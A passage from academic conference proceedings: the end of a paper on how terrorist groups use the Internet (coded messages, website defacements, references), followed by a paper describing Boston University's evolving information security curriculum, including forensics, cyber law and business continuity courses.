other eighteen terrorists who carried out the attacks of 9/11 is reported to have read: “The semester<br />
begins in three more weeks. We’ve obtained 19 confirmations for studies in the faculty of law, the<br />
faculty of urban planning, the faculty of fine arts, and the faculty of engineering.” The reference to the<br />
various faculties is code for the buildings targeted in the attacks (Weimann 2005).<br />
Defacing websites are a popular way for terrorist groups to demonstrate its technical capability and<br />
create fear. These defacements often take the form of public alterations of a website that are visible to<br />
a large audience. An example of such an attack took place in 2001, when a group known as the<br />
Pentaguard defaced a multitude of government and military websites in the UK, Australia, and the<br />
United States. “This attack was later evaluated as one of the largest, most systematic defacements of<br />
worldwide government servers on the Web”. Another example is pro-Palestinian hackers using a<br />
coordinated attack to break into 80 Israel-related sites and deface them, and when al Qaeda<br />
deposited images of the murdered Paul Marshall Johnson, Jr. on the hacked website of the Silicon<br />
Valley Landsurveying, Inc (Brunst 2010).<br />
266
4. Conclusion<br />
Namosha Veerasamy and Marthie Grobler<br />
The use of the Internet by terrorist groups has expanded to both traditional Internet usage and the<br />
more innovative usage of both traditional and new Internet functions. Global terrorist groups can now<br />
electronically target an enormous amount of potential recipients, recruitees and enemies. Terrorist<br />
groups often embrace the opportunities that technology innovation brings about in order to advance<br />
their own terrorist workings.<br />
This paper is informative in nature, aiming to make the public aware of the potential that ICT<br />
infrastructure has in assisting terrorist groups in their operations and normal functions. These<br />
functions include all the processes from recruitment and training of new members, communicating<br />
with existing members, planning and executing operations, distributing propaganda, fund raising and<br />
carrying out psychological warfare. Due to the unique nature of the Internet, many of these traditional<br />
and innovative Internet uses can be carried out in either a uni-directional or bi-directional fashion,<br />
depending on the nature of the communication required.<br />
Based on this research, in can be seen that international terrorist groups can use the Internet in most<br />
of its daily functions to facilitate the growth and operation of the groups. In a sense, terrorist groups<br />
can actively exploit the existing ICT infrastructure to advance their groups. This paper discussed<br />
specific instances and provided examples of this exploitation through web literature use, socialnetworking<br />
tools, anti-forensic techniques and novel fundraising methods. In conclusion, further<br />
research may be done to identify ways on how these innovative uses of the Internet can be used to<br />
counter terrorism attacks, and not only support their activities.<br />
References<br />
Atwan, A. (2006), The secret history of al Qaeda, 1st edn, University of California Press, California.<br />
Bass, R. & Ho, S.M. 2007, AP: 1M archived pages removed post-9/11.<br />
Brachman, J.M. (2006), "High-tech terror: Al-Qaeda's use of new technology", Fletcher Forum of World Affairs,<br />
vol. 30, pp. 149.<br />
Brunst, P.W. (2010), "Terrorism and the Internet: New Threats Posed by Cyberterrorism and Terrorist Use of the<br />
Internet" in , ed. P.W. Brunst, Springer, A war on terror?, pp. 51-78.<br />
Carr, J. (2007), Anti-Forensic Methods Used by Jihadist Web Sites.<br />
Coll, S. & Glasser, S.B. (2005), "Terrorists turn to the Web as base of operations", The Washington Post, vol. 7,<br />
pp. 77–87.<br />
Conway, M. (2006), "Terrorist Use' of the Internet and Fighting Back", Information and Security, vol. 19, pp. 9.<br />
Dizard, W.P. (2006), Internet "cloaking" emerges as new Web security threat, Government Computer News.<br />
Goodman, S.E., Kirk, J.C. & Kirk, M.H. (2007), "Cyberspace as a medium for terrorists", Technological<br />
Forecasting and Social Change, vol. 74, no. 2, pp. 193-210.<br />
Internet World Stats 2010, May 27, 2010-last update, Internet usage statistics - The internet big picture: World<br />
internet users and population stats. Available: http://www.internetworldstats.com/stats.htm [2010, 06/08] .<br />
Jacobson, M. (2009), "Terrorist financing on the internet", CTC Sentinel, vol. 2, no. 6, pp. 17-20.<br />
Jamestown Foundation, (2006), Next Stage in Counter-Terrorism: Jihadi Radicalization on the Web.<br />
Kimmage, D. & Ridolfo, K. (2007), "Iraqi Insurgent Media. The War of Images and Ideas. How Sunni Insurgents<br />
in Iraq and Their Supporters Worldwide are Using the Media", Washington, Radio Free Europe/Radio<br />
Liberty.<br />
Labi, N. (2006), "Jihad 2.0", The Atlantic Monthly, vol. 102.<br />
Lachow, I. & Richardson, C. (2007), "Terrorist use of the Internet: The real story", Joint Force Quarterly, vol. 45,<br />
pp. 100.<br />
Lau, S. (2003), " An analysis of terrorist groups' potential use of electronic steganography ", Bethesda, Md.:<br />
SANS Institute, February, , pp. 1-13.<br />
Noguchi, Y. & Goo, S. (2006), Terrorists’ Web Chatter Shows Concern About Internet Privacy, Wash.<br />
Nordeste, B. & Carment, D. (2006), " Trends in terrorism series: A framework for understanding terrorist use of<br />
the internet ", ITAC, vol. 2006-2, pp. 1-21.<br />
Piper, P. (2008), Nets of terror: Terrorist activity on the internet. Searcher, vol.16, issue 10.<br />
Tibbetts, P.S. (2002), "Terrorist Use of the Internet and Related Information Technologies", Army Command And<br />
General Staff Coll Fort Leavenworth Ks School Of Advanced Military Studies, pp. 1-67.<br />
Weimann, G. (2009), "Virtual Terrorism: How Modern Terrorists Use the Internet", Annual Meeting of the<br />
International Communciation Association, Dresden International Congress Centre, Dresden.<br />
Weimann, G. (2005), "How modern terrorism uses the internet", The Journal of International Security Affairs, vol.<br />
Spring 2005, no. 8.<br />
West, D. & Latham, C.( 2010), "The extremist Edition of Social Networking: The Inevitable Marriage of Cyber<br />
Jihad and Web 2.0", Proceedings of the 5th International <strong>Conference</strong> on Information Warfare and Security,<br />
ed. L. Armistead, <strong>Academic</strong> <strong>Conference</strong>s, .<br />
Whelpton, J. (2009), "Psychology of Cyber Terrorism" in Cyberterrorism 2009 Seminar Ekwinox, South Africa.<br />
267
Evolving an Information Security Curriculum: New<br />
Content, Innovative Pedagogy and Flexible Delivery<br />
Formats<br />
Tanya Zlateva, Virginia Greiman, Lou Chitkushev and Kip Becker<br />
Boston University, USA<br />
zlateva@bu.edu<br />
ggreiman@bu.edu<br />
ltc@bu.edu<br />
kbecker@bu.edu<br />
Abstract: In the last ten years information security has been recognized as a most relevant new trend by<br />
academia, government and industry. The need for educating information security professionals has increased<br />
dramatically and is not being met despite recent growth of cyber security programs. The challenge is to design<br />
and evolve multi-disciplinary curricula that provide theoretical as well as hands-on experience and are also<br />
available to a broad student audience is of strategic importance for the future of reliable and secure systems. We<br />
present our experience in designing and evolving information security programs that have grown to over 650<br />
students per year since their inception eight years ago and have graduated more than 250 students. We discuss<br />
three major directions in the evolution of the program: the increased focus of the core and growth of<br />
concentration electives, the design of cyber law curriculum and coordination with the business continuity<br />
programs, and the introduction of new educational technologies such as virtualization and video-collaboration<br />
and flexible online and blended delivery formats. The rapid growth of the program, the changes in the discipline<br />
and the great diversity of professional interests of our students required broadening of the curriculum with<br />
courses and modules on emerging technologies such as digital forensics, biometrics, security policies and<br />
procedures, privacy and security in health care, cyber law, as well as the coordination of the curriculum with<br />
existing programs in business continuity. Special efforts were expended to the introduction of more participatory<br />
pedagogy, more specifically by developing a series of virtual laboratories that brought real world situations into<br />
the class room and through video-collaboration tools that encourage team building. The accessibility of the<br />
programs was increased through the introduction of flexible delivery formats. After establishing the programs in<br />
the traditional classroom, we added an blended and online version that rapidly found a national audience.<br />
Keywords: information security education, digital forensics, cyber law, virtualization, business continuity, online<br />
and blended learning<br />
1. Introduction<br />
The strong and steadily increasing reliance on a globally distributed computational infrastructure in<br />
virtually all areas of human endeavor—business , industry, government, defense, health care, and<br />
even the individual’s social interactions—has made security and reliability of vital importance and has<br />
sharply increased the need for information security professionals. This need is not being met despite<br />
the recent growth of cyber security programs. The reasons lie in the complexity of the task that<br />
requires building an interdisciplinary curriculum that integrates knowledge domains as diverse<br />
cryptography, ethics, engineering, management and law. An additional challenge is the unusually<br />
large gap between theory, (e.g. cryptographic algorithms), and practical skills, (e.g. setting up a fire<br />
wall), that calls for an imaginative and effective way to bring real world experience into the classroom.<br />
This paper presents and discusses our experience in establishing and growing the information<br />
security concentrations in the Master’s programs in Computer Science, Computer Information<br />
Systems, and Telecommunication at Boston University that are offered through BU’s Metropolitan<br />
College. The programs are certified by the Committee on National Security Systems. Since the<br />
introduction of the security curriculum in 2002 enrollments in our security courses grew to over 650<br />
per year and more than 250 students have completed their Master’s degree with a concentration in<br />
security. We trace the evolution of the programs in three major directions: the broadening and<br />
diversification of the curriculum, developing a cyber law course and coordinating the curriculum with<br />
programs in business continuity , and introducing new educational technologies, (more specifically<br />
virtualization and video-collaboration), and flexible online and blended delivery formats.<br />
2. Design principles, structure, and initial curriculum<br />
We started introducing information security themes in the curriculum in the late 1990-ies and formally<br />
introduced an information security concentration in the Master’s programs of Computer Science,<br />
268
Tanya Zlateva et al.<br />
Computer Information Systems and Telecommunication in 2002. The central goal of the program was<br />
to draw upon the resources of a large research university and to give students the academic<br />
knowledge and technical skills as well as to develop their ability to identify and solve security<br />
problems in their multi-disciplinary complexity taking into account technical, managerial, legal, and<br />
ethical aspects of information security. We emphasized from the outset an interdisciplinary design<br />
approach with strong laboratory and experiential components; a program scope that embraces<br />
contributions from multiple fields; and a program structure that integrates information assurance<br />
concepts, topics, and methods throughout the curriculum as opposed to predominantly in specialized<br />
courses (Zlateva et al., 2003). The integration of information assurance topics across the curriculum is<br />
conducted at three levels (Table 1):<br />
First, the fundamental information assurance topics are taught within the existing core courses at<br />
the undergraduate and graduate level. This ensures that all students are equipped with the basic<br />
knowledge of information security that is currently indispensable for any professional working in<br />
computer software, hardware, systems, or networks.<br />
Second, specialized semester long courses—such as information security, network security,<br />
database security, cryptography, biometrics, digital forensics, etc. —provide in-depth analysis of<br />
different security aspects. These courses provide the core for concentrators in information<br />
security and are available as electives to students outside the information security concentration.<br />
Third, advanced specialized courses—such as web applications, web services, enterprise<br />
computing, mobile applications, data mining etc. —include cyber security topics and modules.<br />
Our Master’s programs consists of ten four-credit courses and a concentration requires the<br />
completion of four courses, typically three specialized that provide depth and one related high level<br />
elective for breadth. When first introduced in 2002 the security concentrations in the MS in CS, CIS,<br />
and TC were based on five specialized courses— cryptography, computer networks and security,<br />
information systems security, database security, and network management and computer security<br />
(Table 1).<br />
The programs were well received and grew rapidly. From a curriculum point of view we soon<br />
recognized two related trends both of which required the introduction of new security topics and<br />
further development of the curriculum both in depth and breadth. From the point of view of pedagogy<br />
and access it became clear that novel online technologies such as virtualization and videocollaboration<br />
can increase the impact of content presentation and that new delivery formats, such as<br />
hybrid or distance learning, can make the program available to students at remote locations or who<br />
are unable to attend on-campus classes due to demanding work schedules. In the following we first<br />
discuss the evolution of the curriculum and then the novel teaching approaches.<br />
The large majority of students in our programs are information technology professionals and a<br />
considerable number are already involved in information security. From the very beginning of the<br />
programs their interests ranged from biometrics to digital forensics on the technical side, and from<br />
security policies to legal and regulatory issues on the managerial and organizational side. At the same<br />
time the information security field was rapidly evolving, maturing, and its importance was becoming<br />
widely recognized. Both these factors required us to deepen the theoretical and applied knowledge of<br />
the core, to updated and broaden the curriculum with topics and/or courses on emerging<br />
technologies, and to seek synergies with programs that focus on related and complementary fields.<br />
Depth was achieved by restructuring the teaching of security fundamentals and adding a course on<br />
network security in recognition of the central importance that global networks play in the modern<br />
world. Breadth was achieved by introducing a four-course certificate in digital forensics, a new course<br />
in biometrics and a number of specialized content modules in the advanced courses. In collaboration<br />
with the administrative sciences department we are currently exploring synergies with the<br />
concentration in Business Continuity, Security, and Risk Management and the introduction of new<br />
course on cyber law.<br />
269
Tanya Zlateva et al.<br />
Table 1: Structure and evolution of the security curriculum (the middle box shows the initial<br />
concentration courses on the right and the new courses are on the left, courses that are<br />
currently offered are in italics)<br />
Information security modules in core undergraduate and graduate courses<br />
(intro programming and data structures, operating systems, data communications and networks,<br />
databases, algorithms, software engineering)<br />
Information Security Concentration Courses<br />
Computer and Network Security<br />
(CS654)<br />
Information Systems Security (CS684)<br />
Database Security (CS674)<br />
Cryptography (CS786)<br />
Network Management and Computer<br />
Security (TC685)<br />
Enterprise Information Security (CS695)<br />
Network Security (CS690)<br />
IT Security Policies and Procedures (CS684)<br />
Electives<br />
3. Evolving the information security curriculum<br />
Advanced Cryptography (CS799)<br />
Biometrics (CS599)<br />
Digital Forensics and Investigations (CS693)<br />
Network Forensics (CS703)<br />
Advanced Digital Forensics (CS713)<br />
1. Network Performance and Management<br />
(CS685)<br />
Information security modules in high-level courses (web application development, web services,<br />
enterprise computing, mobile applications, data mining, biomedical information technology,<br />
electronic health records)<br />
3.1 Focusing and expanding the concentration courses<br />
Initially we provided the security fundamentals in a single course that came in two flavors—a<br />
Computer and Network Security course for the MS in CS and CIS programs and a Network<br />
Management and Computer Security course tailored to the needs of the telecommunication program.<br />
Two years into the program this structure became insufficient for accommodating the growing body of<br />
knowledge in security models and protocols and especially in network security. We restructured the<br />
curriculum by consolidating enterprise security topics into a single course required for all<br />
concentrations and dedicating a full course on network security. The Network Management and<br />
Computer Security course of the telecommunication degree was revised to a Network Performance<br />
and Management which retained an emphasis on security and was moved into the core. (Table 1<br />
shows the evolution of the curriculum and the program and course descriptions are available at the<br />
web site of Boston University (2010a).<br />
The new Enterprise Information Security course lays a solid academic basis for the understanding of<br />
security issues in computer systems, networks, and applications. It discusses formal security models<br />
and their application in operating systems; application level security with focus on language level<br />
270
Tanya Zlateva et al.<br />
security and various security policies; introduction to conventional and public keys encryption,<br />
authentication, message digest and digital signatures, and an overview of Internet and intranet topics.<br />
The Network Security course expands on the fundamentals (security services, access controls,<br />
vulnerabilities, threats and risk, network architectures and attacks) through a discussion on network<br />
security capabilities and mechanisms (access control on wire-line and wireless networks), IPsec,<br />
firewalls, deep packet inspection and transport security. It then addresses network application security<br />
(email, ad-hoc, XML/SAML and Services Oriented Architecture security).<br />
A new course on IT Security Policies and Procedures evolved from and replaced the Information<br />
System Security course by shifting the focus to methodologies for identifying, quantifying, mitigating<br />
and controlling security risks, the development of IT risk management plans, standards, and<br />
procedures that identify alternate sites for processing mission-critical applications, and techniques to<br />
recover infrastructure, systems, networks, data and user access.<br />
3.2 Adding security electives<br />
Elective courses on specialized security topics were added based on student interests and emerging<br />
technologies. In response to an early and sustained interest in digital forensics we developed first a<br />
course and then a Graduate Certificate in Digital Forensics (Boston University 2010a) that can be<br />
taken as a stand-alone or as part of the MS degree. The certificate consists of a required Business<br />
Data and Communication Network course and three forensics courses that build on each other:<br />
Digital Forensics and Investigations (CS693) introduces the investigative process, available<br />
hardware and software tools, digital evidence controls, data acquisition, computer forensic<br />
analysis, e-mail investigations, image file recovery, investigative report writing, and expert witness<br />
requirements.<br />
Network Forensics (CS703) explores the relationship between network forensic analysis and<br />
network security technologies, identification of network security incidents and potential sources of<br />
digital evidence, basic network data acquisition and analysis.<br />
Advanced Digital Forensics (CS713) discusses malicious software, reverse engineering<br />
techniques for conducting static and dynamic forensic analysis on computer systems and<br />
networks, legal considerations, digital evidence controls, and documentation of forensic<br />
procedures.<br />
A Biometrics (CS599) course was developed in response to increased significance of biometrics<br />
approaches and their integration in traditional security schemes. The course presents fundamental<br />
methods for designing applications based on various biometrics, (fingerprints, voice, face, hand<br />
geometry, palm print, iris, retina), multimodal approaches, privacy aspect relating to using of<br />
biometrics data, and system performance issues.<br />
Based on industry demand from high-tech Boston area companies we developed an Advanced<br />
Cryptography (CS713) elective course that expanded the coverage of cryptographic algorithms to<br />
include elliptic curves, block ciphers, the data encryption standard (DES) and double and triple DES,<br />
the advanced encryption standard (AES), cryptographic hash functions (SHA-512 and WHIRLPOOL),<br />
and key management issues<br />
In addition to these new courses we developed security modules in the high level elective including<br />
web application development, web services, enterprise computing, mobile applications, data mining,<br />
and most recently in the courses on biomedical information technology and electronic health records<br />
of our new concentration in Health Informatics.<br />
4. Relating technological aspects to cyber law and business continuity<br />
The importance of protecting information for achieving business success has always been recognized<br />
by the business community but it has reached a new dimension since cyberspace became the<br />
preferred medium for business transactions. Expenses for information security systems continue to<br />
grow and it has been found that quality of information security impacts the financial value of<br />
companies. According to McAfee (2006) United States companies spend as much on information<br />
technology annually as they do on offices, warehouses and factories combined and these<br />
expenditures tend to increase. According to Cavusoglu et al. (2004) firms that experienced internet<br />
271
Tanya Zlateva et al.<br />
security breaches lose an average of 2.1% of their market value within two days and subsequent<br />
studies confirmed the sensitivity of financial performance from security breaches.<br />
The threat of cyber espionage and cyber war is not anymore restricted to expert forums but has<br />
become part of the public discussion. The increased number and sophistication of cyber-attacks<br />
clearly indicate that these attacks originate from professionally run business and government<br />
organizations. Estimates about the degree of the threat may vary—Clarke (2010) posits that cyber<br />
armies are being set up in Russia, China Israel, North Korea and Iran while others believe the goal is<br />
espionage not cyber . However, no one disputes the large negative impact an information security<br />
breach can cause to the economy, government, or the individual.<br />
These development trends clearly indicate that cyber law, business continuity and risk management<br />
provide an indispensable context for framing information security problems and are an integral part of<br />
finding effective solutions. A collaborative effort between the BU MET Computer Science and<br />
Administrative Sciences Department is currently under way for developing a new course in cyber law<br />
and for coordinating the curriculum of the information security concentrations in the MS program in<br />
CS, CIS, and TC with an existing graduate certificate and specialization in Business Continuity,<br />
Security and Risk Management (Boston University 2010b).<br />
4.1 Law and regulation of information security<br />
As technology evolves so must the law. The alleged obsolescence of legal rules in computers and the<br />
Internet among other technologically advanced fields is well recognized in legal scholarship (Moses<br />
2007; Downing 2005). Because the resolution of legal problems are typically left to the chosen dispute<br />
resolution bodies, it is most important to identify in advance the types of legal problems that frequently<br />
follow technological change (Moses 2007; Lessig 1995). Some of the more important questions<br />
arising in relation to information security include:<br />
Defining the technological advancements needed to secure greater protections to the citizens and<br />
communities from cyber-attacks;<br />
Determining who can best regulate the Internet environment and control activity in cyberspace in<br />
a sovereign world;<br />
Constructing with law enforcement and the intelligence communities, an effective means of<br />
sharing actionable information with the private sector (Chander 2002);<br />
Establishing an ethics and conflict policy governing cyber activity and information security to<br />
address cultural change; and<br />
Understanding the ways in which the rise of online interaction alters the balance of power among<br />
individuals, corporations, and government, and how our choice of legal regime should be<br />
influenced by these changes (Chander 2002).<br />
We approach the development of the new information security course by framing a course<br />
methodology and structuring the topics around the areas of the global regulatory environment,<br />
computer crime regulations in the US, jurisprudence over cyber space, culture and information<br />
security, cyber forensics and internet evidence, and international responsibility.<br />
Framing an Information Security Law Curriculum Methodology.<br />
Significantly, the global economy has expanded our vulnerability to manipulation of our software and<br />
hardware through a new phenomena known as "the global supply chain" which increases the number<br />
of actors and the complexity of understanding the legal environment from both a domestic and global<br />
perspective. Technology today passes through many hands including design, manufacture,<br />
distribution, transportation, wholesaler, retailer, installer, repair service and firmware update. To<br />
prevent these vulnerabilities we must focus on better system design, supply chain management,<br />
information security practices, public private partnerships, law enforcement, intelligence and most<br />
important the education of users, employees and management.<br />
The primary pedagogical approach to teaching security information law at Boston University is<br />
through the Socratic method. Diverse Socratic methodologies are used to develop critical thinking<br />
skills including inquiry and debate, examination of complex real-life cybersecurity problems and<br />
ethical concerns, and conflict and contractual analysis, The case studies are derived primarily from<br />
272
Tanya Zlateva et al.<br />
court opinions both domestic and foreign, and are used to provoke discussion, develop problem<br />
solving skills, introduce the importance of team work and assist in attitudinal development. The goal is<br />
to extract and apply important principles of law as well as practical knowledge needed to prevent,<br />
track and enforce cybersecurity laws across jurisdictions. A critical component of the course is the<br />
development of a research project by the students that will highlight emerging topics which will draw<br />
not only upon class discussions but will require the development of a proposal that will advance<br />
innovation and improvement in our current technological and legal structures to combat breaches of<br />
cybersecurity.<br />
The curriculum allows students to progress from a basic understanding of the complex legal system<br />
governing cybersecurity to an overview of the methodologies, technological forensics and<br />
enforcement tools that governments need to fight cybersecurity violations both domestically and<br />
globally. The module includes analyzing legal authorities and boundaries in engaging adversarial<br />
cyber activitities, examining cybersecurity forensics and issues in global prosecution and<br />
enforcement, understanding the advantages and the limitations of private v. public regulation in the<br />
cybersecurity field and identifying ethical, political and cultural concerns in the legal systems of<br />
various countries and developing recommendations for the improvement and harmonization of global<br />
cybersecurity legal systems. A few examples of the key topics incorporated into the module include:<br />
the ability of law enforcement to access stored communications controlled by a third party such as a<br />
service provider or an employer; whether an interception can include acquisition of stored<br />
communications; the definition of electronic storage; the use of surveillance in national security<br />
investigations; the application of the federal Computer Fraud and Abuse Act (CFAA) extraterritorially;<br />
the collection of data from online transactions; the admissibility of electronic evidence; expedited<br />
preservation of computer data; and cross border searches and seizures.<br />
The above topics are of immediate significance for all industries, government academia as internet<br />
technologies have become an operational standard in our professional and private life. Knowledge of<br />
the essentials of information security law is an important requirement for all students today to be<br />
effective and successful in their chosen professions. Teaching security information law is about<br />
awareness, prevention and understanding the risks inherent in cyber attacks and cyberterrorism as<br />
illustrated recently by the denial of access by the U.S. Military Organizations to websites carrying<br />
classified documents released by Wikileaks and leading news organizations. Cyberspace is regulated<br />
through a complex network involving various modalities of constraint that include the legal and<br />
regulatory process, societal norms, markets such as price structures, and finally through the<br />
architecture of cyberspace, or its code (Lessig 1999; Lessig 1995; Bellia et al., 2007).<br />
The role of private entities in cyberspace as a source of regulatory control continues to create<br />
controversy. For example, domain names are controlled by a privately owned entity, the Internet<br />
Corporation for Assigned Names and Numbers (ICANN), that has been making policy for the past ten<br />
years in cooperation with the U.S. Department of Commerce (DoC) (Froomkin 2000). Important<br />
questions arise concerning government oversight and whether any constitutional norms might be<br />
applied to check the activities of these private entities, or whether oversight mechanisms could be<br />
adopted by legislatures (Bellia et al., 2007).<br />
The U.S. Government surveillance under the Wiretap Act, the Electronic Communications Privacy Act<br />
and under the Foreign Intelligence Surveillance Act (FISA) are critical topics for information security<br />
and the case law provides excellent basis for discussing the question when a particular conduct<br />
constitutes a violation of national security. Some scholars believe that all current contracts should<br />
require defense contractors to protect their IT infrastructure to allow DOD evaluation assessments of<br />
the compliance in this area. Others have suggested that Congress should enact a national defenseoriented<br />
statute that mirrors the Department of Homeland Security (DHS) statutes related to our<br />
domestic security (Brown 2009).<br />
In the leading case of Ashcroft v. ACLU, Justice Thomas concluded that website operators should be<br />
responsible for standards of conduct that exist wherever the site is accessible (Ashcroft v. ACLU<br />
2002). This is a significant decision considering that most websites have servers in many locations<br />
around the world.<br />
International Responsibility.<br />
273
Tanya Zlateva et al.<br />
In addition to our students understanding U.S. information security law, to the extent that cyber<br />
terrorists commit cross-border attacks, international law will be at the forefront of responding to these<br />
attacks (Lentz 2010). An international law duty that requires all states to prevent and respond to cyber<br />
terrorist acts has been created by the passage of the United Nations Security Council Resolution<br />
1373, which requires States among other actors to take necessary steps to prevent the commission of<br />
terrorist acts, deny safe havens to those who finance, plan, support or commit terrorist acts, ensure<br />
that any person who participates in the financing, planning, or perpetration of terrorists acts is brought<br />
to justice, and afford one another the greatest measure of assistance in connection with criminal<br />
investigation or proceedings.<br />
4.2 Business continuity, security, and risk management<br />
Business continuity traditionally focuses on the organizational processes that evaluate risks, develop<br />
plans at the strategic, tactical and operational level that ensure the uninterrupted continuation of the<br />
business process. It is a broad management domain distinct from information security but one that<br />
has substantive relationships with issues of information classification and preservation as well as the<br />
sources system vulnerabilities and threats. The specialization in Business Continuity, Security and<br />
Risk Management includes three required courses and a related elective (Boston University, 2010b).<br />
The core curriculum builds an academically solid foundation through discussions of specific industry<br />
needs. The required courses proceed from an overview of central issues and assessment approaches<br />
to details of risk planning and strategy and the development of emergency response plans as follows:<br />
Introduction to Business Continuity, Security, and Risk Management (AD610) is an overview<br />
course that examines management issues involved in assessing the security and risk<br />
environments in both the private and public sectors in order to assure continuous system-wide<br />
operations. The course studies the elements of risk assessment and operational continuity and<br />
exposes the role of the firm in crisis response and management as well as the terms, systems,<br />
and interactions necessary to assure continuous operations.<br />
System-Wide Risk Planning, Strategy, and Compliance (AD613) explores issues relating to<br />
corporate and organizational security and risk from both the perspective of systems designed to<br />
protect against disasters and aspects of emergency preparedness should systems fail. The<br />
course discusses proactive risk assessment, designing and implementing a global assurance<br />
plan, including control measures to assess the plan’s degree of success. The course also<br />
provides explanations of legal/regulatory, auditing, and industry-specific requirements related to<br />
compliance, control, and reporting issues in business risk management. The role of establishing<br />
and maintaining standards by local, national, and international agencies is discussed, as is the<br />
importance of these agencies in certifying operations.<br />
Incident Response and Disaster Recovery (AD614) builds on the concepts introduced in the<br />
previous two courses and applies them in more detail mainly to the corporate-private sector<br />
environment. The focus is on organization and processes necessary to effectively respond to and<br />
manage incidents, including the transition from emergency response and incident management to<br />
business recovery. Disaster recovery is discussed with an emphasis on technology recovery.<br />
The elective course gives students flexibility to pursue their individual interests in one of three areas:<br />
emergency management, project risk and cost management and IT security policies and procedures<br />
though the following courses:<br />
COO-Public Emergency Management (AD612) examines emergency management from national,<br />
state, local, and family perspectives of prevention, preparedness, response, and recovery. The<br />
course encompasses knowledge of the specific agencies, organizations, and individual behaviors<br />
in emergency management as well as the interlinking partnerships between these groups. Areas<br />
of discussion include: responsibilities at federal, state, community and individual levels; guidelines<br />
and procedures for operations and compliance such as the National response Plan; Incident<br />
Command Systems (ICS); plan development, command, and control; communication; partnership<br />
development and maintenance; leadership;<br />
Project Risk and Cost Management (AD644) presents approaches to managing the components<br />
of a project to assure it can be completed through both general and severe business disruptions<br />
on local, national, and international levels. Important aspects include cost management, early cost<br />
estimation, detailed cost estimation, and cost control using earned value method.<br />
IT Security Policies and Procedures (CS684) that was discussed in section 2.<br />
274
Tanya Zlateva et al.<br />
5. Pedagogy, educational technologies and flexible delivery formats<br />
The maturing of the field and the great diversity of student backgrounds naturally led to the need of<br />
more imaginative and more participatory pedagogy. We were especially concerned with teaching our<br />
students how to relate concepts from different areas and apply them on real world applications. To<br />
achieve this we developed a series of virtual laboratories that provided an environment for applying<br />
theoretical concepts, testing different approaches, and assuming alternative roles in various<br />
scenarios.<br />
(Zlateva et al., 2008, Hylkema et al, 2010). The student reflections indicate that the new technologies<br />
enhance understanding and further communication and team building.<br />
Finally we needed also to address the problem of making our programs accessible through flexible<br />
delivery formats. We have considerable experience with flexible delivery formats: first with a blend of<br />
in-class and online in 2000 (Zlateva et al., 2001), and since 2003 a fully online MS in CIS program.<br />
The online version of the security concentration was introduced in 2005. There are significant<br />
differences in the preparation and the delivery of an face-to-face and an online course. One of the<br />
most important factors for successful teaching and learning online is the ability to create a meaningful<br />
and close student-teacher and student-student interaction. Towards this goal we introduced videoconferencing<br />
tools that were used for discussion and review sessions with the instructor, and also by<br />
student teams working on a project. The feedback from students and faculty is overwhelmingly<br />
positive and we are currently developing use cases that reflect the best practices for these<br />
technologies.<br />
6. Conclusions and future work<br />
For the last eight years we developed a comprehensive curriculum for security education. The core<br />
ensures an in-depth discussion of security of operating systems, software, networks as well as<br />
security policies and procedures. This core is complemented by concentration electives in digital<br />
forensics, biometrics, advanced cryptography, and security modules in high-level courses such as<br />
web technologies, enterprise computing, data mining, health informatics. The information security<br />
programs are linked to the programs of business continuity that provide much needed management<br />
context. From a methodological point of view great care is taken to relate abstract theory to practical<br />
skills and team work by using virtual laboratories and video-collaboration tools. Overall the curriculum<br />
introduces analytical dialogue, creative concepts and critical pedagogical methodologies to advance<br />
student learning.<br />
References<br />
Ashcroft v. ACLU 542 U.S. 656 (2004).<br />
Boston University (2010a) Information Security Programs (http://www.bu.edu/csmet/academic-programs/ ) and<br />
Course Descriptions (http://www.bu.edu/csmet/academic-programs/courses/)<br />
Boston University (2010b) Business Continuity, Security and Risk Management<br />
http://www.bu.edu/online/online_programs/graduate_degree/master_management/emergency_managemen<br />
t/courses.shtml<br />
Bellia, P.L., Berman, P.S. & Post, D.G. (2007). Cyberlaw: Problems of Policy and Jurisprudence in the<br />
Information Age, 4-10, St. Paul, MN: Thompson/West.<br />
Brown, T.A. (Lt. Col.) (2009). Sovereignty in Cyberspace: Legal Propriety of Protecting Defense Industrial Base<br />
Information Infrastructure, 64 A.F.L. Rev. 21, 256-257.<br />
Cavusoglu, H., Mishra, B. and Raghunathan, S. (2004)."The effect of Internet security breach announcements on<br />
market value: capital market reactions for breached firms and Internet security developers," International<br />
Journal of Electronic Commerce, Vol. 9, Number 1, pp. 69-104.<br />
Chabinsky, S. R. (2010). Cybersecurity Strategy: A Primer for Policy Makers and Those on the Front Line, 4 J.<br />
Nat'l Security L. & Pol'y 27, 38.<br />
Chander, A. (2002). Whose Republic? 69 U. Chi. L. Rev. 1479.<br />
Clarke, R.A. (2010). Cyber War, New York: Harper Collins.<br />
Cohen, A. (2010). Cyberterrorism: Are we Legally Ready? 9 J. Int'l bus. & L. 1, 40.<br />
Downing ,R. W. (2005). Shoring up the Weakest Link: What Lawmakers Around the World Need to Consider in<br />
Developing Comprehensive Laws to Combat Cybercrime, 43 Colum. J. Transnat’l L. 705, 716-19.<br />
Hylkema, M., Zlateva, T., Burstein, L. and Scheffler, P (2010). Virtual Laboratories for Learning Real World<br />
Security - Operating Systems. Proc. 14th Colloquium for Information Systems Security Education,<br />
Baltimore, MD June 7 – 9.<br />
Kerr, O.S. (2003). Cybercrime's Scope: Interpreting 'Access' and 'Authorization' in Computer Misuse Statutes, 78<br />
NYU Law Review No. 5, 1596, 1621 (citing various state and federal statutes defining "access").<br />
Lentz, C.I. (2010). A State's Duty to Prevent and Respond to Cyberterrorist Acts, 10 Chi. J. Int'l L. 799, 822-823.<br />
275
Tanya Zlateva et al.<br />
Lessig, L. (1995). The Path of Cyberlaw, 104 Yale L.J. 1743, 1743-45.<br />
Lessig, L. (1999). The Law of the Horse: What Cyberlaw Might Teach, 113 Harv. L. Rev. 501, 509.<br />
Moses, L.B. (2007). Recurring Dilemmas: The Law’s Race to Keep Up With Technological Change, University of<br />
Illinois Journal of Law, Technology & Policy, The Board of Trustees of the University of Illinois, 7 U. Ill. J.L.<br />
Tech. & Policy 239, 241-243.<br />
Zlateva, T., Burstein, L., Temkin, A., MacNeil, A. and Chitkushev, L. (2008): Virtual Laboratories for Learning<br />
Real World Security. Proceedings of the Colloquium for Information Systems Security Education, Society for<br />
Advancing Information Assurance and Infrastructure Protection, Dallas, Texas, June 2-4, 2008.<br />
Zlateva, S.; Kanabar, V. , Temkin, A. , Chitkushev, L. and Kalathur, S. (2003): Integrated Curricula for Computer<br />
and Network Security Education, Proceedings of the Colloquium for Information Systems Security<br />
